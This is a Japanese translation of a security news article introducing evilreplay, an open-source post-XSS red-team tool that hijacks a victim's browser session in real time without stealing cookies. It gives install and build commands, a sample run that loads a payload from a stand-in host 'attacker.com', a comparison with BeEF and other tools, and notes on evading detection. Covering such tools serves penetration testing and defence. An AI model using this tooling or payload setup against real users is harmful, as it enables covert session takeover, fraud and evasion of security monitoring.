Evilreplayは、Ege Balciによる新しいポストXSSツールで、レッドチームがクッキーやトークンを盗むことなく、被害者のブラウザセッションをリアルタイムでハイジャックし、操作できるようにします。これはブラウザエクスプロイトフレームワークを基盤とし、リアルタイムのユーザー行動を独自に可視化します。
概要
evilreplayはクロスサイトスクリプティング(XSS)を利用して、ターゲットのブラウザにコントロールエージェントを注入します。実行されると、フォーム入力、クリック、ナビゲーション、観察などのインタラクティブなセッション制御を提供します。従来のクッキーに基づくセッションハイジャックとは異なり、このツールはブラウザコンテキスト内で直接動作します。
主な利点は以下の通りです:
- 被害者コンテキストでのインタラクティブなコマンド実行
- クッキー窃取検知メカニズムの回避
- BeEF Project – Browser Exploitation Frameworkのようなフレームワークと連携し、連鎖的なブラウザ攻撃を実現
インストール
|
git clone https://github.com/EgeBalci/evilreplay<br>cd ./evilreplay/tracker/tracker-assist<br>bun install <br>bun run build <br>cd ../tracker <br>bun run build |
依存関係:
- Goコンパイラ バージョン1.18以上
- ポストXSSペイロードをホストするためのWebサーバーへのアクセス
|
./evilreplay —help evilreplayの使い方: —listen string コントロールインターフェースの待受アドレス (デフォルト “127.0.0.1:8080”) —payload–url string XSSペイロードを提供するURL —ui–port int コントロールダッシュボード用ポート (デフォルト 3000) |
XSSペイロード注入後のサンプルデプロイ:
|
./evilreplay —payload–url https://attacker.com/payload.js |
被害者がXSSを引き起こすページにアクセスすると、コントロールダッシュボードがhttp://127.0.0.1:3000で利用可能になります。攻撃者はフォーム入力、ナビゲーション、マウスイベントのシミュレーションやネットワークアクティビティの取得など、クッキーを流出させることなく操作できます。
主な機能
- ライブセッションハイジャック:DOM操作やユーザー体験をリアルタイムで制御
- クッキー窃取不要:クッキー窃取検知を回避
- 軽量UI:ブラウザダッシュボードでリアルタイムの操作やページ状態を表示
- オープンソース:さまざまな攻撃経路への評価やカスタマイズが可能
ユースケース
このツールはレッドチームやペネトレーションテスターに最適です:
- ライブ演習中のインタラクティブなDOM操作の実演
- 既存セッションを利用した操作により、クッキー窃取に特化した防御を回避
- 完全なブラウザコンテキスト内でのソーシャルエンジニアリング(例:偽フォームやアラート)
レッドチームへの有用性
evilreplayはポストエクスプロイトに新たな次元を追加します:
- 自動化されたクッキー窃取ツールよりもステルス性が高い
- 熟練したレッドチームは、フィッシングやC2コールバックと連携させて、持続的なブラウザベースの制御を維持可能
他ツールとの比較
| ツール | メンテナンス状況 | リアルタイムセッション制御 | クッキー窃取必要 | ステルス性 | 主な用途 |
|---|---|---|---|---|---|
| evilreplay | ✅ あり(2025) | ✅ あり(クリック、キー入力、ネットワークログ) | ❌ なし | ✅ 高い | XSS後のクッキー窃取なしリモートブラウザ制御 |
| BeEF | ⚠️ 部分的(最終コミット2021) | ⚠️ 限定的(コマンドベースモジュール) | ⚠️ 場合による | ❌ 中程度 | XSSによるモジュラー型ブラウザエクスプロイト |
| OpenReplay | ✅ あり | ✅ あり(リプレイ、UX監視) | ❌ なし | ❌ 低い | 開発/UXチーム向けセッションリプレイ(レッドチーム用途ではない) |
| XSSHunter | ❌ 放棄 | ❌ なし | ✅ あり | ❌ 低い | ワンショットXSSペイロードログ(例:alert表示) |
| HookShell | ✅ アクティブ(2025) | ✅ あり(インタラクティブシェル) | ✅ あり | ⚠️ 変動 | フックされたブラウザタブ内でのライブコマンド実行 |
evilreplayはOpenReplayを基盤に、XSS後のリアルタイムブラウザセッションハイジャックを実現し、クッキー窃取なしでインタラクティブな制御を提供します。BeEFよりもステルス性が高くDOM操作に特化し、XSSHunterやHookShellのような受動的ツールよりも実践的です。
検知回避
- クッキー窃取を必要としないため、一般的なアラートが無効化される
- 異常なリクエストではなく、通常のDOMイベントを生成
- 多層防御を推奨:DOM操作、スクリプト活動、異常なネットワーク挙動を監視
考慮点と制限事項
- 信頼性のある初期XSSベクトルが必要
- 被害者のブラウザが注入されたペイロードJSを受け入れる必要がある
- 被害者がページに留まっている間のみ有効
- ユーザーアクションの記録は、評価時に法的・倫理的問題を引き起こす可能性あり
詳細やevilreplayのダウンロードはこちら:https://github.com/EgeBalci/evilreplay
翻訳元: https://www.darknet.org.uk/2025/07/evilreplay-real-time-browser-session-hijack-without-cookie-theft/